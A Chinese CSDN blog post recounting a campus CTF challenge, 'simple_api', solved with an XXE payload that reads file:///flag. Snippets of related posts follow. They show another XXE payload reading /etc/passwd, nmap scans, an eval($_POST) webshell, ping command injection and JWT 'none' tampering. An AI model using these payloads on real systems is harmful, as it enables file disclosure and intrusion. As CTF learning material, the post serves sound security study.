记录遇到的有趣的CTF题---simple_api(xxe漏洞)

最新推荐文章于 2024-06-06 20:38:23 发布
最新推荐文章于 2024-06-06 20:38:23 发布
阅读量2k 收藏 3
点赞数
分类专栏: xxe 文章标签: ctf xxe x
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43478096/article/details/101765427
版权

这是我参加的一场校内的CTF比赛。大佬们的write up还在整理当中,我就先用我之前做题时的截图做一个简单的复现。write up出来后再查漏补缺。

1.打开网站后除了这个啥也没有,查看源代码也没有提示。
在这里插入图片描述

学过python的同学应该会发现这一段字典,但在这里的意思应该是响应错误,但仔细看了源码后也没与发现注入点,这时想到题目名为simple_api。
抓包添加xxe代码后就能跑出flag了。
在这里插入图片描述xxe注入代码:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE poem [
 <!ENTITY xxe SYSTEM
"file:///flag">
  ]>
<poem>
	&xxe;
</poem>
tothemoon_2019
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF内网渗透笔记
qq_26579613的博客
11-10 3889
一、漏洞挖掘相关工具的使用 NMAP扫描工具使用 1.扫描指定的IP范围 nmap 192.168.0.101-110 2.扫描指定的IP网段 nmap 192.168.0.* --exclude 192.168.0.100 3.扫描指定网址的操作系统类型(深度扫描) nmap -A 192.168.0.101 or nmap -O 192.168.0.101 4.扫描网络内活跃的主机(该命令会跳过端口扫描或检测) nmap -sP 192.168.0.* 5.快速扫描主
xml指南-chm版本
04-20
10. **XML的安全性**:XML还涉及到一些安全问,如XXE(XML External Entity)攻击和XSS(Cross-site scripting)攻击,因此在处理XML时需要注意防止这些安全漏洞。 在"XML指南-chm版本"中,你可能会学习如何创建...
CTF-Web】XXE学习笔记(附ctfshow例
jayq1的博客
05-29 992
XXE学习笔记
83.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结_杨秀璋的专栏-CSDN博客1
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。前文学习:[网络
一篇文章带你入门XXE
最新发布
csjjjd的博客
06-06 983
XML External Entity(XXE)攻击是一种利用 XML 处理器的漏洞,通过引入恶意的外部实体来攻击应用程序的安全性。这种攻击通常发生在对用户提供的 XML 数据进行解析时,攻击者利用了 XML 规范允许引用外部实体的特性。 用一句话总结就是: 一句话总结就是:XXE攻击利用XML解析器的漏洞,通过在XML数据中注入恶意实体,使服务器解析时返回敏感信息或执行攻击者指定的操作。
CTF | REVERSE练习之API定位
qq_42646885的博客
07-23 965
目描述: 主机C:\Reverse\2目录下有一个CrackMe2.exe程序,运行这个程序的时候会提示输入一个密码,当输入正确的密码时,会弹出过关提示消息框,请对CrackMe2.exe程序进行逆向分析和调试,找到正确的过关密码。 实验步骤: 1、外部行为分析 在随便输入字符和不输入字符时情况如下: 所以目的是找到一个正确的密码输入。 2、查看是否加壳 选中程...
CTF相关了解
qq_44841017的博客
04-21 1539
基础知识 CTF简介 CTF(Capture The Flag,夺旗赛)CTF 的前身是传统黑客之间的网络技术比拼游戏,起源于 1996 年第四届 DEFCON,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。 CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中...
CTF比赛解析备课与教学:漏洞扫描
lm19770429的专栏
08-25 507
发现弱点 • 发现漏洞 • 基于端口服务扫描结果版本信息(速度慢) • 搜索已公开的漏洞数据库(数量大) • 使用弱点扫描器实现漏洞管理 在线查找漏洞代码kali:https://www.exploit-db.com/
信息安全_xxe注入应用与拓展.pptx
08-14
3. **开发框架的Content-Type智能识别**:例如SpringMVC框架,当接收到XML内容并使用JAXB进行反序列化时,如果没有正确的安全设置,可能会导致XXE漏洞。 4. **使用SAML的登录接口**:SAML协议用于身份验证和授权数据...
xml.rar jsp
10-16
- **SAX(Simple API for XML)**:基于事件驱动的解析器,适用于处理大型XML文档,因为其占用更少的内存。 3. **XML解析** - **DOM解析**:一次性加载整个XML文档到内存中,适合小型XML文件。 - **SAX解析**:...
XML指南
09-24
- **XXE(XML External Entity)**:利用XML外部实体解析漏洞,可能导致数据泄露或DoS攻击。 - 防范措施:使用安全的解析器配置,限制XML解析器的特性,进行输入验证等。 6. **XML在Web服务中的应用** - **SOAP...
xml转json包与教程
05-11
5. **安全与最佳实践**:在处理XML到JSON的转换时,应注意防止XXE(XML External Entity)攻击,这是一种利用XML解析器漏洞获取服务器敏感信息的攻击方式。确保使用安全配置的XML解析器,并避免解析不受信任的XML...
ctf训练 web安全命令注入漏洞
qq_43799246的博客
12-05 2132
ctf训练 web安全命令注入漏洞 实验环境 一台kail攻击机 和 靶机 靶机镜像:https://pan.baidu.com/s/1FG3VbDmDGHY8rOtuOFhRxA 提取码:oues 安装打开靶机(使用Oracle VM VirtualBox打开): (注意:靶机用桥接模式则攻击机也用桥接模式,注意检查!!!!) 接下来发现没法登陆,也没有办法获取ip地址 所以我们在kail下 进入控制台 使用netdiscover命令 netdiscover -r ip/子网掩码 命令来探测靶机 信息
CTF第三天
qq_52680097的博客
05-26 464
[极客大挑战 2019]Knife 1 进去以后,看到这个页面,猜想要用蚁剑 例 //eval — 把字符串bai作为PHP代码执行 eval('echo 123;');//输出123 eval($_POST["Syc"]);//上传一个字符串Sys 打开蚁剑,添加URL,密码为Sys 连接后在根目录找到flag [GXYCT [GXYCTF2019]Ping Ping Ping 1 进去后看到这个一个查询ip的格式,我们可以用这个来输入命令 首先输入/?ip=127.0.0.1|ls,发现了
渗透测试ctf软件黑客工具(第一)
kaitoulee
05-10 6148
名 称版 描 述 主 页 0trace1.5跳跃枚举工具http://jon.oberheide.org/0trace/ 3proxy0.7.1.1微小的免费代理服务器。http://3proxy.ru/ 3proxy-win32的0.7.1.1微小的免费代理服...
XXE漏洞攻击——几道CTF
qq_45521281的博客
05-14 7524
文章目录Fake XML CookbookTrue XML Cookbook(XXE+ssrf)ISCC 未知的风险-1 Fake XML Cookbook sql注入不行,F12 查看源码: function doLogin(){ var username = $("#username").val(); // val() 方法返回或设置被选元素的值 var password = $("#password").val(); // $() 相当于 document.getElementById(
一天一道ctf 第55天(controllers/api.js JWT)
scrawman的博客
08-18 381
审查元素发现是js框架且有app.js文件: 看了wp才知道要访问controllers/api.js,行吧就当积累经验了。 重点是这里: const token = jwt.sign({secretid, username, password}, secret, {algorithm: 'HS256'}); jwt之前也遇到过了,我们可以抓包一个jwt然后解密出secret。注册一个账号然后登录,拿到令牌。 在https://jwt.io/这个网站上可以解析jwt 把加密方法改为none,us
xxe学习之hetianlab-simplexxe及buuctf-fake xml cookbook
m0_62008601的博客
04-22 328
目录 定义 xml的基本格式和语法 合天网安实验室-simplexxe buuctf-fake cookbook 首先,我们先来初步了解一下什么是xxe 1、定义 XXE(XMLExternalEntityInjection)全称为XML外部实体注入,由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml_load默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。而学习XXE要从认识XM...
PHP环境 XML外部实体注入漏洞XXE
EC_Carrot的博客
07-19 972
漏洞简介 libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡,这里用libxml2.8.0版本编译进PHP中来复现。 漏洞复现 Simple XXE Payload: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE xxe [ <!ELEMENT name ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <root> &lt
泛微oa e-cology xxe 漏洞
08-17
泛微OA是一种常见的企业办公自动化系统,而XXE(XML外部实体注入)漏洞是指攻击者通过注入恶意的外部实体来读取或利用系统中的敏感数据。 泛微OA的XXE漏洞是由于系统对外部XML实体的处理不当所导致的。攻击者可以通过构造恶意的XML实体并将其发送给系统,然后利用系统对外部实体的解析不当来读取系统中的文件,包括敏感的配置文件、数据库信息。攻击者还可以通过XXE漏洞发起钓鱼攻击或者是向系统发送恶意的请求来进一步导致系统的安全漏洞。 为了防范泛微OA的XXE漏洞,建议以下几点: 1. 进行安全审计:对泛微OA系统进行定期的安全审计,通过检测系统中的漏洞和弱点,及时修复存在的XXE漏洞。 2. 模板限制:在处理外部XML实体时,应限制或阻止对外部实体的解析,避免可能的XXE攻击。可以通过设置合适的解析选项,限制对外部实体的访问权限。 3. 输入验证与过滤:对于用户输入的数据,应进行合理的验证和过滤,确保输入的内容符合预期格式,避免恶意的外部实体注入。 4. 更新补丁:定期保持泛微OA系统的更新与升级,及时安装官方发布的补丁和修复漏洞的版本。 5. 安全意识培训:加强企业员工的安全意识培训,提高他们对XXE漏洞及其他安全威胁的认识,避免因无意中点击恶意链接或下载恶意附件而导致漏洞的利用。 通过以上措施,可以有效地减少泛微OA中的XXE漏洞,提升系统的安全性。及早识别并修复漏洞,有助于保护企业的机密信息以及防止潜在的安全威胁发生。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值